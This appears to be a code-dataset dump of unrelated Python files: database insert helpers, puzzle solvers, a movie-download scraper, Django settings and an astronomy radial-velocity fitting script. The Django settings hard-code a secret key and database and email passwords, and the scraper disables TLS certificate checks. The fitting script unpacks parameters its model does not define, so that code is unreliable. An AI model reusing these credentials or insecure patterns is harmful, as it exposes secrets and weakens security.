$6, $7)\n \"\"\",\n stories,\n )\n\n async def add_tiers(self, region, event_id, time, is_last, rows, singular):\n time = time.replace(second=0, microsecond=0)\n\n async with self.pool.acquire() as c, c.transaction():\n await c.executemany(\n \"\"\"\n INSERT INTO border_fixed_data_v3 VALUES\n ($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13, $14, $15,\n $16, $17, $18, $19, $20, $21, $22, $23, $24, $25)\n ON CONFLICT (serverid, event_id, tier_type, observation) DO NOTHING\n \"\"\",\n ((region, event_id, time, is_last, *r) for r in singular),\n )\n await c.executemany(\n \"\"\"\n INSERT INTO border_data_v3 VALUES ($1, $2, $3, $4, $5, $6, $7, $8)\n ON CONFLICT (serverid, event_id, tier_type, tier_to, observation) DO NOTHING\n \"\"\",\n ((region, event_id, time, is_last, *r) for r in rows),\n )\n\n async def add_t100(self, region, event_id, type_, rows):\n async with self.pool.acquire() as c, c.transaction():\n await c.executemany(\n \"\"\"\n INSERT INTO border_t100_v1 VALUES\n ($1, $2, $3, $4, $5, $6, $7, $8, $9, $10, $11, $12, $13)\n ON CONFLICT (serverid, event_id, tier_type, rank) DO NOTHING \n \"\"\",\n ((region, event_id, type_, *r) for r in rows),\n )\n\n async def clear_norm_tiers(self, region, event_id):\n async with self.pool.acquire() as c, c.transaction():\n await c.execute(\"DELETE FROM border_data_v3\")\n","sub_path":"maintenance/border/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":8733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"500535353","text":"_dir = \"./Google Code Jam 2017/Qualification Round/Tidy Numbers/\"\n\nt, lines, result = 0, [], []\nwith open(_dir + \"B-small-practice.in\") as f:\n t = int(f.readline())\n lines = f.readlines()\n\nfor line in lines:\n for i in range(len(line)-2):\n if (line[i] > line[i+1]):\n line = line[0:i] + str(int(line[i])-1) + '9'*(len(line)-i-2)\n result.append(''.join(line))\n\nwith open(_dir + \"result-small.txt\", \"w\") as f:\n for i in range(len(result)):\n f.write(\"Case #\" + str(i+1) + \": \" + str(int(result[i])) + \"\\n\")\n\n# error when 111110","sub_path":"Google Code Jam 2017/Qualification Round/Tidy Numbers/tidyNumber.py","file_name":"tidyNumber.py","file_ext":"py","file_size_in_byte":562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"596544042","text":"\"\"\"\nadd_owner_ids.py\n\nQuery Elasticsearch using Safe ID and campus to write back out with OwnerId.\n\"\"\"\n\nimport argparse\nimport csv\n\nimport sys\nfrom os import pardir, path\nfilepath = path.abspath(__file__)\nparent_dir = path.abspath(path.join(filepath, pardir))\npackage_dir = path.abspath(path.join(parent_dir, pardir))\nsys.path.insert(0, package_dir)\n\nfrom elasticsearch_dsl import Search\nfrom elasticsearch_dsl.connections import connections as es_connections\nimport requests\n\nfrom salesforce_fields import contact_note as cn_fields\nfrom secrets.elastic_secrets import ES_CONNECTION_KEY\n\nCONTACT_UNKNOWN_STRING = \"StillNotFound\"\n\n\ndef write_owner_ids(csv_filename, campus):\n \"\"\"\n Query Elasticsearch using Safe ID and campus to write back out with OwnerId.\n \"\"\"\n\n with open(csv_filename) as csvfile:\n reader = csv.DictReader(csvfile)\n\n outfile_name = \"ownerids_{}\".format(csv_filename)\n with open(outfile_name, 'w') as outfile:\n fieldnames = reader.fieldnames\n writer = csv.DictWriter(outfile, fieldnames=fieldnames)\n writer.writeheader()\n\n for row in reader:\n if row[cn_fields.CONTACT] != CONTACT_UNKNOWN_STRING:\n ac_safe_id = get_owner_id(campus, row[cn_fields.CONTACT])\n row[\"OwnerId\"] = ac_safe_id\n writer.writerow(row)\n\n\ndef get_owner_id(campus, safe_id):\n \"\"\"\n Query Elasticsearch using alum's Salesforce ID to get the OwnerId.\n\n Parameters:\n * campus: str campus name (Elastic index to query)\n * safe_id: str alum's Salesforce ID\n\n Returns the Safe Id for the AC/Owner of the alum if found.\n If no results, returns \"Unavailable\".\n \"\"\"\n\n s = Search().from_dict({\n \"query\": {\n \"match\": {\n \"safe_id\": safe_id,\n }\n }\n })\n s = s.index(campus)\n\n results = s.execute()\n if len(results) == 0:\n return \"Unknown\"\n elif len(results) == 1:\n return results[0].ac_safe_id\n\n\ndef parse_args():\n \"\"\"Get input filename.\"\"\"\n\n parser = argparse.ArgumentParser(description=\"Specifiy input file\")\n parser.add_argument(\n 'infile',\n help=\"Input csv file\",\n )\n parser.add_argument(\n 'campus',\n default=None,\n help=\"Campus (index) to query against\",\n )\n\n return parser.parse_args()\n\n\nif __name__=='__main__':\n args = parse_args()\n es_connection = es_connections.create_connection(\n hosts=[ES_CONNECTION_KEY]\n )\n write_owner_ids(args.infile, args.campus)\n","sub_path":"add_owner_ids.py","file_name":"add_owner_ids.py","file_ext":"py","file_size_in_byte":2562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"342319647","text":"import sys\nimport Leap\nfrom pygameWindow import PYGAME_WINDOW\nimport constants as c\nimport random\n\nsys.path.insert(0, '...')\npygameWindow = PYGAME_WINDOW()\n\nx = c.pygameWindowWidth/2\ny = c.pygameWindowDepth/2\n\n\nxMin = 1000.0\nxMax = -1000.0\nyMin = 1000.0\nyMax = -1000.0\n\n\ndef Perturb_Circle_Position():\n global x, y\n fourSidedDieRoll = random.randint(1,4)\n if fourSidedDieRoll == 1:\n x += 1\n if fourSidedDieRoll == 2:\n x -= 1\n if fourSidedDieRoll == 3:\n y -= 1\n if fourSidedDieRoll == 4:\n y += 1\n\n\nprint(pygameWindow)\ncontroller = Leap.Controller()\n\nnumhands = 0\nwhile True:\n pygameWindow.Prepare()\n frame = controller.frame()\n hands = frame.hands\n\n\n handlist = frame.hands\n\n def Handle_Frame(frame):\n global x, y\n global xMin, xMax, yMin, yMax\n hand = frame.hands[0]\n #print(hand)\n fingers = hand.fingers\n indexFingerList = fingers.finger_type(Leap.Finger.TYPE_INDEX)\n indexFinger = indexFingerList[0]\n distalPhalanx = indexFinger.bone(3)\n tip = distalPhalanx.next_joint\n\n x = int(tip[0])\n y = int(tip[1])\n\n if x < xMin:\n xMin = x\n if x > xMax:\n xMax = x\n if y < yMin:\n yMin = y\n if y > yMax:\n yMax = y\n print(\"Xval:\"+str(x), \"YVal:\"+str(y))\n\n def Scale(OldValue, OldMin, OldMax, NewMin, NewMax):\n # Set the scale defined by the newmin and newmax value\n # between_min_max = between_min_max * (newmin + newmax)\n # Don't let OldMax = OldMin\n if OldMax == OldMin:\n OldMax += 0.1\n between_min_max = (((OldValue - OldMin) * (NewMax - NewMin)) / (OldMax - OldMin)) + NewMin\n\n between_min_max = int(between_min_max)\n\n # print(\"The Scaled Value:\",between_min_max)\n\n return between_min_max\n\n # If the Frame is empty say there are no hands\n if frame.hands.is_empty:\n handPresent = False\n numhands = 0\n\n if not frame.hands.is_empty:\n handPresent = True\n numhands = frame.hands\n\n Handle_Frame(frame)\n\n pygameX = Scale(x, xMin, xMax, 0, c.pygameWindowWidth)\n\n # Invert the Y so we flip the two last values.\n pygameY = Scale(y, yMin, yMax, c.pygameWindowDepth, 0)\n\n # The yMin was too low for me to be able to touch the bottom of the frame\n yMin = 70\n # Perturb_Circle_Position()\n\n\n pygameWindow.Draw_Black_Circle(pygameX, pygameY)\n pygameWindow.Reveal()\n\n\n\n\n\n","sub_path":"Del01.py","file_name":"Del01.py","file_ext":"py","file_size_in_byte":2501,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"210425348","text":"\"\"\"The longest common subsequence problem is the problem of finding the longest subsequence common to all sequences\nin a set of sequences. It differs from the longest common substring problem: unlike substrings, subsequences are not\nrequired to occupy consecutive positions within the original sequences. \"\"\"\n\n\"\"\"For better understanding watch the video https://youtu.be/sSno9rV8Rhg\"\"\"\n\n\ndef lcs(string1, string2):\n m = len(string1)\n n = len(string2)\n\n l = [[None for _ in range(n + 1)] for _ in range(m + 1)]\n\n for i in range(m + 1):\n for j in range(n + 1):\n if i == 0 or j == 0:\n l[i][j] = 0\n\n elif string1[i - 1] == string2[\n j - 1]: # check the alphabet of the 2 string match or not, in matrix indices are one extra therefore we reduce indices by 1\n l[i][j] = 1 + l[i - 1][j - 1] # if match the condition add diagonal value by 1 and store into the current index\n\n else:\n l[i][j] = max(l[i - 1][j],\n l[i][j - 1]) # if not matches store the max value of the previous row and previous column\n\n return l\n\n\nstring1 = \"BDCB\"\nstring2 = \"BACDB\"\n\na = lcs(string1, string2)\nprint(a)\nprint(\"Longest Sequences \", a[-1][-1])\n\nl1 = len(string1)\nl2 = len(string2)\n\nsequence = []\nval = None\n\nwhile val != 0: # continue the loop until you reaches to the zero value\n if a[l1][l2] == a[l1][l2 - 1]: # if the consecutive value of the same row is equal then reduce the column by 1\n l2 -= 1\n else:\n # if the consecutive value of the same row is not equal then reduce the column and row by 1 to go to 1\n # level up\n val = a[l1 - 1][l2 - 1]\n sequence.insert(0, string2[l2 - 1]) # insert that value from where index goes up\n l1 -= 1\n l2 -= 1\nprint(\"Sequence is\", \"\".join(sequence))\n","sub_path":"DynamicApproach/LongestCommonSequence.py","file_name":"LongestCommonSequence.py","file_ext":"py","file_size_in_byte":1869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"168636298","text":"################### create Movie of configs #####################\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport matplotlib\nfrom mmc_LJ_trap import *\nmatplotlib.use(\"Agg\")\nu, coordinates = mmc()\nimport matplotlib.animation as manimation\n\nFFMpegWriter = manimation.writers['ffmpeg']\nmetadata = dict(title='Movie Test', artist='Matplotlib',\n comment='Movie support!')\nwriter = FFMpegWriter(fps=20, metadata=metadata)\n\nfig = plt.figure()\nl, = plt.plot([], [], 'ro')\nplt.setp(l, markersize=30)\nplt.setp(l, markerfacecolor='C0') \n\n\nplt.xlim(-5, 5)\nplt.ylim(-5, 5)\n\nx, y = np.zeros(N_particles), np.zeros(N_particles)\n\nwith writer.saving(fig, \"movie_of_configs.mp4\", 100):\n\tfor _ in range(mc_steps):\n\t\tcoord = coordinates[_]\n\t\tfor i in range(N_particles):\n\t\t\tx[i] = coord[i, -1]\n\t\t\ty[i] = coord[i, 0]\n\t\tl.set_data(x, y)\n\t\twriter.grab_frame()\n","sub_path":"projects/project_6/Shipra_Yaoyi_Louis_Lucas/movie_maker.py","file_name":"movie_maker.py","file_ext":"py","file_size_in_byte":862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"647966680","text":"# -*- coding: utf-8 -*-\nimport scrapy\nimport requests\nfrom lxml import etree\nfrom MovieCrawl.items import MoviecrawlItem\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n# 禁用安全请求警告\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\ndef getHTMLTEXT(url):\n try:\n response = requests.get(url, timeout=30, verify=False)\n response.raise_for_status()\n if 'charset' not in response.headers.keys(): # 确保编码方式的正确\n response.encoding = response.apparent_encoding\n return response.text\n except:\n return 'getHTMLTEXT Error!'\n \n\nclass MovieSpider(scrapy.Spider):\n name = 'Movie'\n allowed_domains = ['80s.tw/movie']\n\n def start_requests(self):\n pageUrlPrefix = 'https://www.80s.tw/movie/list/-----p' # 网页url的前缀\n crawlNum = 400\n thisPageMovieLinkPrefix = 'https://www.80s.tw'\n for eachNum in range(crawlNum):\n pageUrl = pageUrlPrefix + str(eachNum+1)\n htmlTEXT = getHTMLTEXT(pageUrl) # 这里获得了每一页的HTML文本文件\n html = etree.HTML(htmlTEXT) #利用lxml.etree来解析html文本\n thisPageMovieTags = html.xpath('//*[@id=\"block3\"]/div[3]/ul[2]/li/a') #这么页面所有电影的链接\n for eachTag in thisPageMovieTags:\n thisPageMovieLinkSuffix = eachTag.attrib['href'] #href仅仅是后缀,所以要拼接\n thisPageMOvieLink = thisPageMovieLinkPrefix + thisPageMovieLinkSuffix\n yield scrapy.Request(url=thisPageMOvieLink, callback=self.parseFunc)\n\n\n def parseFunc(self, response):\n item = MoviecrawlItem()\n element = response.xpath('//*[@id=\"minfo\"]/div[1]/img')\n try:\n pcitreLink = element[0].xpath('@src').extract()[0]\n item['pictureLink'] = pcitreLink\n except IndexError:\n item['pictureLink'] = 'Pciture Not Found!\\n The Link is ' + response.url\n try:\n title = element[0].xpath('@title').extract()[0]\n item['cineName'] = title\n except IndexError:\n item['cineName'] = 'CineName Not Found\\n The Link is ' + response.url\n try:\n downloadLink = response.xpath('//*[@id=\"myform\"]/ul/li[2]/span[3]/a/@href').extract()[0]\n item['downloadLink'] = downloadLink\n except IndexError:\n item['downloadLink'] = 'DownLoad Link Not Found !\\n The Link is ' + response.url\n try:\n iD = response.xpath('//*[@id=\"wap-enter\"]/a/@href').extract()[0].split('/')[-1]\n item['iD'] = iD\n except IndexError:\n item['iD'] = 'ID Not Found ! \\n The Link is ' + response.url\n\n yield item","sub_path":"ScrapyProject/MovieCrawl/MovieCrawl/spiders/Movie.py","file_name":"Movie.py","file_ext":"py","file_size_in_byte":2766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"120849115","text":"\nimport os\nPROJECT_DIR = os.path.dirname(__file__)\n# Django settings for allenrutherford project.\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n # ('Your Name', 'your_email@domain.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.mysql', # Add 'postgresql_psycopg2', 'postgresql', 'mysql', 'sqlite3' or 'oracle'.\n 'NAME': 'jones124_resp', # Or path to database file if using sqlite3.\n 'USER': 'jones124_resp', # Not used with sqlite3.\n 'PASSWORD': 'Ueisugi9', # Not used with sqlite3.\n 'HOST': '', # Set to empty string for localhost. Not used with sqlite3.\n 'PORT': '', # Set to empty string for default. Not used with sqlite3.\n }\n}\n\n# Local time zone for this installation. Choices can be found here:\n# http://en.wikipedia.org/wiki/List_of_tz_zones_by_name\n# although not all choices may be available on all operating systems.\n# On Unix systems, a value of None will cause Django to use the same\n# timezone as the operating system.\n# If running in a Windows environment this must be set to the same as your\n# system time zone.\nTIME_ZONE = 'Europe/London'\n\n# Language code for this installation. All choices can be found here:\n# http://www.i18nguy.com/unicode/language-identifiers.html\nLANGUAGE_CODE = 'en-gb'\n\nSITE_ID = 1\n\n# If you set this to False, Django will make some optimizations so as not\n# to load the internationalization machinery.\nUSE_I18N = True\n\n# If you set this to False, Django will not format dates, numbers and\n# calendars according to the current locale\nUSE_L10N = True\n\n# Absolute path to the directory that holds media.\n# Example: \"/home/media/media.lawrence.com/\"\nMEDIA_ROOT = os.path.join(PROJECT_DIR, 'media/')\n\n# URL that handles the media served from MEDIA_ROOT. Make sure to use a\n# trailing slash if there is a path component (optional in other cases).\n# Examples: \"http://media.lawrence.com\", \"http://example.com/media/\"\nMEDIA_URL = '/media/'\n\n# URL prefix for admin media -- CSS, JavaScript and images. Make sure to use a\n# trailing slash.\n# Examples: \"http://foo.com/media/\", \"/media/\".\nADMIN_MEDIA_PREFIX = '/media-admin/'\n\n# Make this unique, and don't share it with anybody.\nSECRET_KEY = 'caiu*u-%jkmzk!c%!0plodg@2^3l$*!phjvx#&&lu5igc-6udh'\n\n# List of callables that know how to import templates from various sources.\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n# 'django.template.loaders.eggs.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n# 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'resp.urls'\n\nTEMPLATE_DIRS = (\n # Put strings here, like \"/home/html/django_templates\" or \"C:/www/django/templates\".\n # Always use forward slashes, even on Windows.\n # Don't forget to use absolute paths, not relative paths.\n)\n\nINSTALLED_APPS = (\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sessions\",\n \"django.contrib.sites\",\n \"django.contrib.admin\",\n \"django.contrib.comments\",\n \"resp.smartpages\",\n \"paston_stuff.tagsnfilters\",\n \"paston_stuff.thumbnails\",\n \"django.contrib.markup\",\n \"resp.docupload\",\n \"resp.rightfeature\",\n \"resp.contact\",\n)\n\nTEMPLATE_CONTEXT_PROCESSORS = (\n\"django.core.context_processors.auth\",\n\"django.core.context_processors.debug\",\n\"django.core.context_processors.i18n\",\n\"django.core.context_processors.media\",\n#\"news.context_processors.latestnews\",\n\"cp.meta_processor\")\n\n\nTEMPLATE_DIRS = (os.path.join(PROJECT_DIR, 'templates/'),)\nDATABASE_ENGINE = 'mysql'\n\nEMAIL_HOST = 'localhost'\nEMAIL_SUBJECT_PREFIX = '[] '\nSESSION_EXPIRE_AT_BROWSER_CLOSE = True\nDEFAULT_FROM_EMAIL = 'no-reply@resp.jones124.webfactional.com'\nLOCAL_DEV = False\n\n#CONTACT_EMAIL_TO = 'jon+juniortest@wearefarm.com'\nCONTACT_EMAIL_TO = 'mike_k_jones@hotmail.com'\n\nEMAIL_HOST = 'smtp.webfaction.com'\nEMAIL_HOST_PASSWORD = '0a8599a7'\nEMAIL_HOST_USER = 'jones124'\n\n","sub_path":"settings.py","file_name":"settings.py","file_ext":"py","file_size_in_byte":4273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"464275645","text":"# based on GP_85390_celerite_2_planets.py\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom rv import solve_kep_eqn\n\n#==============================================================================\n# Import data \n#==============================================================================\n\nall_rvs = np.loadtxt('HD85390_quad.vels')\nRV_HARPS = np.loadtxt('RV_HARPS.dat')\n\nx \t\t= all_rvs[:,0]\ny = (RV_HARPS-np.mean(RV_HARPS))*1000\nyerr \t= all_rvs[:,2]\n\nimport time\nimport os\nimport shutil\ntime0 = time.time()\ndir_name = 'celerite' + str(time0)\nos.makedirs(dir_name)\nshutil.copy('GP_85390_celerite_1_planet.py', dir_name +'/GP_85390_celerite_1_planet.py') \nos.chdir(dir_name)\n\nplt.figure()\nplt.errorbar(x, y, yerr=yerr, fmt=\".k\", capsize=0)\nplt.ylabel(\"RV [m/s]\")\nplt.xlabel(\"Shifted JD [d]\")\nplt.savefig('HD85390-1-RV.png')\n# plt.show()\n\n#==============================================================================\n# Model\n#==============================================================================\nimport celerite\nfrom celerite.modeling import Model\n\nclass Model(Model):\n parameter_names = ('P1', 'tau1', 'k1', 'w1', 'e1', 'offset1', 'offset2')\n\n def get_value(self, t):\n\n # Planet 1\n M_anom1 = 2*np.pi/(100*self.P1) * (t - 1000*self.tau1)\n e_anom1 = solve_kep_eqn(M_anom1, self.e1)\n f1 = 2*np.arctan( np.sqrt((1+self.e1)/(1-self.e1))*np.tan(e_anom1*.5) )\n rv1 = 100*self.k1*(np.cos(f1 + self.w1) + self.e1*np.cos(self.w1))\n\n offset = np.zeros(len(t))\n idx = t < 57300\n offset[idx] = self.offset1\n offset[~idx]= self.offset2\n\n return rv1 + offset\n\ntruth = dict(P1=8., tau1=1., k1=np.std(y)/100, w1=0., e1=0.4, offset1=0., offset2=0.)\nkwargs = dict(**truth)\nkwargs[\"bounds\"] = dict(P1=(7.5,8.5), k1=(0,0.1), w1=(-2*np.pi,2*np.pi), e1=(0,0.8))\nmean_model = Model(**kwargs)\n\n#==============================================================================\n# The fit\n#==============================================================================\nfrom scipy.optimize import minimize\n\nimport celerite\nfrom celerite import terms\n\n# Set up the GP model\n# kernel = terms.RealTerm(log_a=np.log(np.var(y)), log_c=-np.log(10.0))\nkernel = terms.SHOTerm(log_S0=np.log(2), log_Q=np.log(20), log_omega0=np.log(1/3000))\ngp = celerite.GP(kernel, mean=mean_model, fit_mean=True)\ngp.compute(x, yerr)\nprint(\"Initial log-likelihood: {0}\".format(gp.log_likelihood(y)))\n\n# Define a cost function\ndef neg_log_like(params, y, gp):\n gp.set_parameter_vector(params)\n return -gp.log_likelihood(y)\n\n# def grad_neg_log_like(params, y, gp):\n# gp.set_parameter_vector(params)\n# return -gp.grad_log_likelihood(y)[1]\n\n# Fit for the maximum likelihood parameters\ninitial_params = gp.get_parameter_vector()\nbounds = gp.get_parameter_bounds()\nsoln = minimize(neg_log_like, initial_params, method=\"L-BFGS-B\", bounds=bounds, args=(y, gp))\ngp.set_parameter_vector(soln.x)\nprint(\"Final log-likelihood: {0}\".format(-soln.fun))\n\n# Make the maximum likelihood prediction\nt = np.linspace(min(x), max(x), 10000)\nmu, var = gp.predict(y, t, return_var=True)\nstd = np.sqrt(var)\n\n# Plot the data\n# plt.figure()\ncolor = \"#ff7f0e\"\nplt.errorbar(x, y, yerr=yerr, fmt=\".k\", capsize=0)\nplt.plot(t, mu, color=color)\nplt.fill_between(t, mu+std, mu-std, color=color, alpha=0.3, edgecolor=\"none\")\nplt.ylabel(r\"$y$\")\nplt.xlabel(r\"$t$\")\n# plt.gca().yaxis.set_major_locator(plt.MaxNLocator(5))\nplt.title(\"maximum likelihood prediction\");\nplt.savefig('HD85390-5-min-prediction.png')\nplt.show()\n\n#==============================================================================\n# MCMC\n#==============================================================================\n# Define the posterior PDF\n# Reminder: post_pdf(theta, data) = likelihood(data, theta) * prior_pdf(theta)\n# We take the logarithm since emcee needs it.\n\n# As prior, we assume an 'uniform' prior (i.e. constant prob. density)\n\ndef lnprior(params):\n _, _, _, P1, tau1, k1, w1, e1, offset1, offset2 = params\n if (7.5 < P1 < 8.5) and (0 < k1 < 0.1) and (-2*np.pi < w1 < 2*np.pi) and (0 < e1 < 0.8): \n return 0.0\n return -np.inf\n\n# As likelihood, we assume the chi-square. Note: we do not even need to normalize it.\n# def lnlike(theta):\n# P1, tau1, k1, w1, e1, P2, tau2, k2, w2, e2, offset1, offset2 = theta\n# fit_curve = Model(P1=P1, tau1=tau1, k1=k1, w1=w1, e1=e1, \n# P2=P2, tau2=tau2, k2=k2, w2=w2, e2=e2, offset1=offset1, offset2=offset2)\n# y_fit = fit_curve.get_value(x)\n# return -0.5*(np.sum( ((y-y_fit)/yerr)**2))\n\ndef lnprob(params):\n gp.set_parameter_vector(params)\n lp = lnprior(params)\n # lp = gp.log_prior()\n if not np.isfinite(lp):\n return -np.inf\n return gp.log_likelihood(y) + lp\n\n\nimport emcee\ninitial = gp.get_parameter_vector()\n# initial = np.array(initial_params)\n# initial = np.array(soln.x)\nndim, nwalkers = len(initial), 32\nsampler = emcee.EnsembleSampler(nwalkers, ndim, lnprob, threads=14)\n\nimport time\ntime_start = time.time()\n\nprint(\"Running first burn-in...\")\npos = initial + 1e-4 * np.random.randn(nwalkers, ndim)\npos, prob, _ = sampler.run_mcmc(pos, 3000)\n\n\nprint(\"Running second burn-in...\")\npos = pos[np.argmax(prob)] + 1e-4 * np.random.randn(nwalkers, ndim)\npos, prob, _ = sampler.run_mcmc(pos, 2000)\n\n# print(\"Running third burn-in...\")\n# pos = pos[np.argmax(prob)] + 1e-8 * np.random.randn(nwalkers, ndim)\n# pos, prob, _ = sampler.run_mcmc(pos, 2000)\n\nprint(\"Running production...\")\n# pos = pos[np.argmax(prob)] + 1e-4 * np.random.randn(nwalkers, ndim)\n# pos, prob, state = sampler.run_mcmc(pos, 3000)\n# sampler.reset()\nsampler.run_mcmc(pos, 3000);\n\ntime_end = time.time()\nprint('\\nRuntime = %.2f seconds' %(time_end - time_start))\n\n\n#==============================================================================\n# Trace and corner plots \n#==============================================================================\n\nimport copy\nraw_samples = sampler.chain[:, 3000:6000, :].reshape((-1, ndim))\nreal_samples = copy.copy(raw_samples)\nreal_samples[:,4] = 10*real_samples[:,4]\nreal_samples[:,9] = 10*real_samples[:,9]\nreal_samples[:,3:6] = 100*real_samples[:,3:6]\nreal_samples[:,8:11] = 100*real_samples[:,8:11]\nidx = real_samples[:,6] > 0\nreal_samples[idx,6] = real_samples[idx, 5] - 2*np.pi\nidx = real_samples[:,11] < 0\nreal_samples[idx,11] = real_samples[idx, 11] + 2*np.pi\n\n# import copy\n# raw_samples = sampler.chain[:, 3000:6000, :].reshape((-1, ndim))\n# real_samples = copy.copy(raw_samples)\n# real_samples[:,3] = 10*real_samples[:,3]\n# real_samples[:,8] = 10*real_samples[:,8]\n# real_samples[:,2:5] = 100*real_samples[:,2:5]\n# real_samples[:,7:10] = 100*real_samples[:,7:10]\n# idx = real_samples[:,5] > 0\n# real_samples[idx,5] = real_samples[idx, 5] - 2*np.pi\n# idx = real_samples[:,10] < 0\n# real_samples[idx,10] = real_samples[idx, 10] + 2*np.pi\n\n\nfig, axes = plt.subplots(ndim, figsize=(20, 14), sharex=True)\nlabels_log=[\"1\", \"2\", \"3\", r\"$\\frac{P_{1}}{100}$\", r\"$\\frac{T_{1}}{1000}$\", r\"$\\frac{K_{1}}{100}$\", r\"$\\omega1$\", r\"$e1$\", \n r\"$\\frac{P_{2}}{100}$\", r\"$\\frac{T_{2}}{1000}$\", r\"$\\frac{K_{2}}{100}$\", r\"$\\omega2$\", r\"$e2$\", \n \"offset1\", \"offset2\"]\nfor i in range(ndim):\n ax = axes[i]\n ax.plot( np.rot90(sampler.chain[:, :, i], 3), \"k\", alpha=0.3)\n ax.set_xlim(0, sampler.chain.shape[1])\n ax.set_ylabel(labels_log[i])\n ax.yaxis.set_label_coords(-0.1, 0.5)\n\naxes[-1].set_xlabel(\"step number\");\nplt.savefig('HD85390-2-Trace.png')\n# plt.show()\n\n\nimport corner\nlabels=[\"1\", \"2\", \"3\", r\"$P1$\", r\"$T_{1}$\", r\"$K1$\", r\"$\\omega1$\", r\"$e1$\", r\"$P2$\", r\"$T_{2}$\", r\"$K2$\", r\"$\\omega2$\", r\"$e2$\", \"offset1\", \"offset2\"]\nfig = corner.corner(real_samples, labels=labels, quantiles=[0.16, 0.5, 0.84], show_titles=True)\nplt.savefig('HD85390-3-Corner.png')\n# plt.show()\n\n\n#==============================================================================\n# Output\n#==============================================================================\n\nv0, v1, v2, a0, a1, a2, a3, a4, a5, a6, a7, a8, a9, a10, a11 = map(lambda v: (v[1], v[2]-v[1], v[1]-v[0]), zip(*np.percentile(real_samples, [16, 50, 84], axis=0)))\naa = np.zeros((12,3))\naa[0,:] = [a0[i] for i in range(3)]\naa[1,:] = [a1[i] for i in range(3)]\naa[2,:] = [a2[i] for i in range(3)]\naa[3,:] = [a3[i] for i in range(3)]\naa[4,:] = [a4[i] for i in range(3)]\naa[5,:] = [a5[i] for i in range(3)]\naa[6,:] = [a6[i] for i in range(3)]\naa[7,:] = [a7[i] for i in range(3)]\naa[8,:] = [a8[i] for i in range(3)]\naa[9,:] = [a9[i] for i in range(3)]\naa[10,:]= [a10[i] for i in range(3)]\naa[11,:]= [a11[i] for i in range(3)]\nnp.savetxt('HD85390_fit.txt', aa, fmt='%.6f')\n\n\n\nP1, tau1, k1, w1, e1, P2, tau2, k2, w2, e2, offset1, offset2 = aa[:,0]\nfig = plt.figure(figsize=(10, 7))\nframe1 = fig.add_axes((.15,.3,.8,.6))\nframe1.axhline(y=0, color='k', ls='--', alpha=.3)\nt_sample = np.linspace(min(x), max(x), num=10001, endpoint=True)\n# Planet 1 #\nPlanet1 = Model(P1=P1/100, tau1=tau1/1000, k1=k1/100, w1=w1, e1=e1, \n P2=P2/100, tau2=tau2/1000, k2=0, w2=w2, e2=e2, offset1=offset1, offset2=0)\ny1 = Planet1.get_value(t_sample)\nplt.plot(t_sample, y1, 'b-.', alpha=.3, label='Planet1')\n# Planet 2 #\nPlanet2 = Model(P1=P1/100, tau1=tau1/1000, k1=0, w1=w1, e1=e1, \n P2=P2/100, tau2=tau2/1000, k2=k2/100, w2=w2, e2=e2, offset1=0, offset2=offset2)\ny2 = Planet2.get_value(t_sample)\nplt.plot(t_sample, y2, 'b--', alpha=.3, label='Planet2')\n# Planet1 + Planet2 #\ny12 = y1 + y2\nplt.plot(t_sample, y12, 'b-', alpha=.5, label='Planet1+Planet2')\nplt.errorbar(x, y, yerr=yerr, fmt=\".k\", capsize=0, label='HARPS RV')\nplt.legend()\nplt.ylabel(\"Radial velocity [m/s]\")\n\nfit_curve = Model(P1=P1/100, tau1=tau1/1000, k1=k1/100, w1=w1, e1=e1, \n P2=P2/100, tau2=tau2/1000, k2=k2/100, w2=w2, e2=e2, offset1=offset1, offset2=offset2)\ny_fit = fit_curve.get_value(x)\n\nresidual = y_fit - y\nchi2 = sum(residual**2 / yerr**2)\nrms = np.sqrt(np.mean(residual**2))\nwrms = np.sqrt(sum((residual/yerr)**2) / sum(1/yerr**2))\n\nframe2 = fig.add_axes((.15,.1,.8,.2)) \nframe2.axhline(y=0, color='k', ls='--', alpha=.3)\nplt.errorbar(x, residual, yerr=yerr, fmt=\".k\", capsize=0)\nplt.xlabel(\"BJD - 2400000\")\nplt.ylabel('Residual [m/s]')\nplt.savefig('HD85390-4-MCMC_fit.png')\nplt.close(\"all\")\n\n\nsolution = np.arange(15)\nsolution[0] = v0[0]\nsolution[1] = v1[0]\nsolution[2] = v2[0]\nsolution[3:] = aa[:,0]\n\ngp.set_parameter_vector(solution)\n# Make the maximum likelihood prediction\nt = np.linspace(min(x), max(x), 10000)\nmu, var = gp.predict(y, t, return_var=True)\nstd = np.sqrt(var)\n\n\n# Plot the data\nplt.figure()\ncolor = \"#ff7f0e\"\nplt.errorbar(x, y, yerr=yerr, fmt=\".k\", capsize=0)\nplt.plot(t, mu, color=color)\nplt.fill_between(t, mu+std, mu-std, color=color, alpha=0.3, 